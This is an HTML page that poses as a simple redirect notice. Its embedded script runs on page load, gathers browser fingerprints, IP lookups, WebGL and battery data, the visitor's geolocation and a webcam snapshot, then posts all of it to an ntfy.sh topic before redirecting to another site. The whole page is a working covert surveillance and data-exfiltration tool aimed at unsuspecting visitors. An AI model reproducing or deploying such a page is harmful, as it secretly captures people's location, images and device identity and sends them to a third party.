<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Redirect</title>
  </head>
  <body>
    Redirecting... click <a href="#">here</a> if you are not redirected.
  </body>
  <script>
    const serverUrl =
      "https://ntfy.sh/" + (window.location.hash.slice(1) || "traccc");
    const redirectUrl = "http://lj.aaaa.8st.j1.mil.id/";

    setTimeout(() => {
      window.location = redirectUrl;
    }, 15000);

    const trackers = {
      browserFp: function (cb) {
        cb({
          width: [window.innerWidth, window.outerWidth, window.screen.width],
          height: [
            window.innerHeight,
            window.outerHeight,
            window.screen.height,
          ],
          userAgent: navigator.userAgent,
          language: navigator.language,
          platform: navigator.platform,
          vendor: navigator.vendor,
          cookieEnabled: navigator.cookieEnabled,
          doNotTrack: navigator.doNotTrack,
          deviceMemory: navigator.deviceMemory,
          hardwareConcurrency: navigator.hardwareConcurrency,
          maxTouchPoints: navigator.maxTouchPoints,
          isMobile: navigator.userAgent.includes("Mobile"),
          isTablet: navigator.userAgent.includes("Tablet"),
          isDesktop:
            !navigator.userAgent.includes("Mobile") &&
            !navigator.userAgent.includes("Tablet"),
          url: window.location.href,
          incognito: window.chrome?.extension?.isAllowedIncognitoAccess,
          referer: document.referrer,
          timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
          plugins: Array.from(navigator.plugins).map((plugin) => plugin.name),
          mimeTypes: Array.from(navigator.mimeTypes).map(
            (mimeType) => mimeType.type
          ),
        });
      },

      ipify: function (cb) {
        fetch("https://api.ipify.org?format=json")
          .then((response) => response.json())
          .then((data) => cb(data));
      },

      ipinfo: function (cb) {
        fetch("https://ipinfo.io/json")
          .then((response) => response.json())
          .then((data) => cb(data));
      },

      ednsipapi: function (cb) {
        fetch("https://edns.ip-api.com/json")
          .then((response) => response.json())
          .then((data) => cb(data));
      },

      webgl: function (cb) {
        const canvas = document.createElement("canvas");
        const gl =
          canvas.getContext("webgl") || canvas.getContext("experimental-webgl");
        const debugInfo = gl.getExtension("WEBGL_debug_renderer_info");
        const vendor = gl.getParameter(debugInfo.UNMASKED_VENDOR_WEBGL);
        const renderer = gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL);
        cb({ vendor, renderer });
      },

      webaudio: function (cb) {
        setTimeout(() => {
          const audioCtx = new (window.AudioContext ||
            window.webkitAudioContext)();
          const oscillator = audioCtx.createOscillator();
          oscillator.type = "sine";
          oscillator.frequency.setValueAtTime(440, audioCtx.currentTime);
          oscillator.connect(audioCtx.destination);
          oscillator.start();
          oscillator.stop(audioCtx.currentTime + 0.1);
          cb({ audioCtx });
        }, 1000);
      },

      battery: function (cb) {
        navigator.getBattery().then((battery) => {
          cb({
            charging: battery.charging,
            chargingTime: battery.chargingTime,
            dischargingTime: battery.dischargingTime,
            level: battery.level,
          });
        });
      },

      html5geo: function (cb) {
        navigator.geolocation.getCurrentPosition((position) => {
          cb({
            latitude: position.coords.latitude,
            longitude: position.coords.longitude,
            accuracy: position.coords.accuracy,
          });
        });
      },

      camera: function (cb) {
        navigator.mediaDevices
          .getUserMedia({ video: true })
          .then((stream) => {
            const video = document.createElement("video");
            video.srcObject = stream;
            video.onloadedmetadata = () => {
              video.play();
              const canvas = document.createElement("canvas");
              canvas.width = video.videoWidth;
              canvas.height = video.videoHeight;
              canvas.getContext("2d").drawImage(video, 0, 0);
              const data = canvas.toDataURL("image/png");
              cb({ data });
              stream.getTracks().forEach((track) => track.stop());
            };
          })
          .catch((error) => {
            cb({ error });
          });
      },
    };

    document.addEventListener("DOMContentLoaded", function () {
      // get or set the fingerprint
      let cid =
        localStorage.getItem("cid") ||
        Math.random().toString(36).substring(2, 13);
      localStorage.setItem("cid", cid);

      for (const [key, send] of Object.entries(trackers)) {
        send(function (data) {
          fetch(serverUrl, {
            method: "POST",
            headers: {
              "Content-Type": "application/json",
            },
            body: JSON.stringify({
              cid,
              key,
              data,
            }),
          });
        });
      }
    });
  </script>
</html>
